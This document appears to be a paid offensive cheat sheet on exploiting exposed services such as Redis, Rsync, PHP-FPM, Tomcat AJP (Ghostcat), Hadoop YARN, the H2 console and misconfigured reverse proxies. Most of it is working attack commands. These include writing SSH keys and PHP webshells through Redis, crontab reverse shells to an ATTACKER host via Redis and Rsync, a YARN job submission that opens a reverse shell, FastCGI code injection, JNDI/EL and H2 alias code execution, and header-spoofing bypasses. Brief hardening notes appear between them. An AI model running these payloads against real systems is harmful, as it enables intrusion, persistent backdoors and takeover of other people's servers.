unauthorized-access-common-services

$27

1. DISCOVERY — PORT SCANNING

nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET

# Key ports:

# 6379  — Redis

# 873   — Rsync

# 9000  — PHP-FPM (FastCGI)

# 8009  — AJP (Tomcat Ghostcat)

# 8088  — Hadoop YARN ResourceManager

# 8082  — H2 Console (or embedded in Spring Boot)

# 1099  — Java RMI Registry

# 9200  — Elasticsearch

# 5984  — CouchDB

# 2375  — Docker API

# 27017 — MongoDB

# 11211 — Memcached

2. REDIS (PORT 6379)

Detection

redis-cli -h TARGET ping

# Response: PONG = unauthenticated access confirmed

redis-cli -h TARGET INFO server

# Returns Redis version, OS, config

Write SSH Authorized Keys

# Generate key pair:

ssh-keygen -t rsa -f redis_rsa

# Write public key to Redis, then dump to authorized_keys:

redis-cli -h TARGET flushall

cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key

redis-cli -h TARGET config set dir /root/.ssh

redis-cli -h TARGET config set dbfilename authorized_keys

redis-cli -h TARGET save

# Connect:

ssh -i redis_rsa root@TARGET

Write Crontab (Reverse Shell)

redis-cli -h TARGET

> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"

> config set dir /var/spool/cron/

> config set dbfilename root

> save

Write Webshell

redis-cli -h TARGET

> set webshell "<?php system($_GET['cmd']); ?>"

> config set dir /var/www/html/

> config set dbfilename shell.php

> save

# Access: http://TARGET/shell.php?cmd=id

Master-Slave Replication RCE

Use redis-rogue-server to exploit master-slave replication for loading malicious .so module:

python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER

# Loads module via SLAVEOF → MODULE LOAD → system.exec

Hardening

requirepass STRONG_PASSWORD

bind 127.0.0.1

protected-mode yes

rename-command CONFIG ""

rename-command FLUSHALL ""

3. RSYNC (PORT 873)

Detection

rsync TARGET::

# Lists available modules (shares) if anonymous access allowed

rsync -av TARGET::MODULE_NAME /tmp/loot/

# Download entire module contents

Exploitation — Write Crontab

# Create reverse shell cron:

echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /tmp/evil_cron

# Upload to target's crontab (if writable module maps to /etc/ or similar):

rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor

Hardening

# /etc/rsyncd.conf:

auth users = rsync_user

secrets file = /etc/rsyncd.secrets

list = no

hosts allow = 10.0.0.0/8

read only = yes

4. PHP-FPM / FASTCGI (PORT 9000)

Mechanism

PHP-FPM listens for FastCGI requests. If exposed to the network (instead of Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code.

Exploitation

# Using fcgi_exp or similar tool:

python3 fpm.py TARGET 9000 /var/www/html/index.php -c "<?php system('id'); ?>"

# Key parameters in FastCGI request:

# SCRIPT_FILENAME = path to any existing .php file

# PHP_VALUE = "auto_prepend_file = php://input"  (injects POST body as PHP code)

# PHP_ADMIN_VALUE = "allow_url_include = On"

Key FastCGI Environment Variables for Exploitation

SCRIPT_FILENAME = /var/www/html/index.php   # must point to an existing .php file

PHP_VALUE = auto_prepend_file = php://input  # injects POST body as PHP code

PHP_ADMIN_VALUE = allow_url_include = On     # enables remote inclusion

Via SSRF (gopher)

gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...

# Encoded FastCGI packet

# Tool: Gopherus generates the gopher:// URL

python3 gopherus.py --exploit fastcgi

Hardening

; php-fpm.conf — bind to socket only:

listen = /var/run/php-fpm.sock

; If TCP required, restrict:

listen.allowed_clients = 127.0.0.1

5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938

Mechanism

Apache JServ Protocol (AJP) is used between reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set javax.servlet.include.request_uri to read arbitrary files from the webapp directory.

File Read

# Using ajpShooter or similar:

python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

# Reads any file within the webapp root:

# /WEB-INF/web.xml          — deployment descriptor

# /WEB-INF/classes/*.class  — compiled Java classes

# /WEB-INF/lib/*.jar        — library JARs

File Include → RCE

If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP:

python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval

# If the file contains JSP code, it gets executed

Hardening

<!-- server.xml — disable AJP or add secret: -->

<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>

<!-- Or remove the AJP connector entirely -->

6. HADOOP YARN RESOURCEMANAGER (PORT 8088)

Detection

curl http://TARGET:8088/cluster

# If accessible → unauthenticated YARN ResourceManager UI

RCE via Application Submission

# Submit a MapReduce application that executes a command:

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application

# Returns: {"application-id":"application_xxx_0001"}

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps \

  -H "Content-Type: application/json" \

  -d '{

    "application-id": "application_xxx_0001",

    "application-name": "test",

    "am-container-spec": {

      "commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"}

    },

    "application-type": "YARN"

  }'

Hardening

Enable Kerberos authentication; restrict network access to management ports.

7. H2 DATABASE CONSOLE

Detection

H2 Console is often enabled in Spring Boot apps via:

spring.h2.console.enabled=true

spring.h2.console.settings.web-allow-others=true

Access: http://TARGET:PORT/h2-console

JNDI Injection via Connection String

In the H2 Console login form, the JDBC URL field accepts JNDI.

BeanFactory + EL bypass (works on Java 8u252+):

# JDBC URL in login form:

javax.naming.InitialContext

# LDAP response attributes:

javaClassName: javax.el.ELProcessor

javaFactory: org.apache.naming.factory.BeanFactory

forceString: x=eval

x: Runtime.getRuntime().exec("id")

Also see jndi-injection for the full JNDI/BeanFactory exploitation flow.

RCE via RUNSCRIPT

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';

CALL EXEC('id');

8. QUICK REFERENCE

# Redis — check auth:

redis-cli -h TARGET ping

# Redis — write webshell:

SET x "<?php system($_GET['c']);?>"

CONFIG SET dir /var/www/html/

CONFIG SET dbfilename shell.php

SAVE

# Rsync — list modules:

rsync TARGET::

# Ghostcat — read web.xml:

python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

# YARN — submit RCE job:

curl -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application

# H2 — RCE via alias:

CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');

9. REVERSE PROXY MISCONFIGURATION

Nginx Off-By-Slash Path Traversal

# Vulnerable configuration:

location /static {

    alias /var/www/static/;

}

# Access: /static../etc/passwd → resolves to /var/www/etc/passwd

# The missing trailing slash on location causes path traversal

# Fix: location /static/ (with trailing slash matching alias)

Nginx Missing Root Location

# If no root location defined and alias is used:

# Attacker may access nginx.conf or other server files

GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1

X-Forwarded-For / X-Real-IP Trust

# If backend trusts these headers for IP-based auth:

GET /admin HTTP/1.1

X-Forwarded-For: 127.0.0.1

X-Real-IP: 127.0.0.1

True-Client-IP: 127.0.0.1

# May bypass IP whitelist for admin panels

Caddy Template Injection

# Caddy with templates enabled:

# If user input reaches Caddy template rendering:

{{.Req.Host}}          → Information disclosure

{{readFile "/etc/passwd"}}  → Local file read via Go template

# This is essentially a Go template injection through proxy config

Useful Tools

• yandex/gixy — Nginx configuration analyzer

• Raelize/Kyubi — Reverse proxy misconfiguration scanner

• GerbenJavado/bypass-url-parser — URL parser confusion tester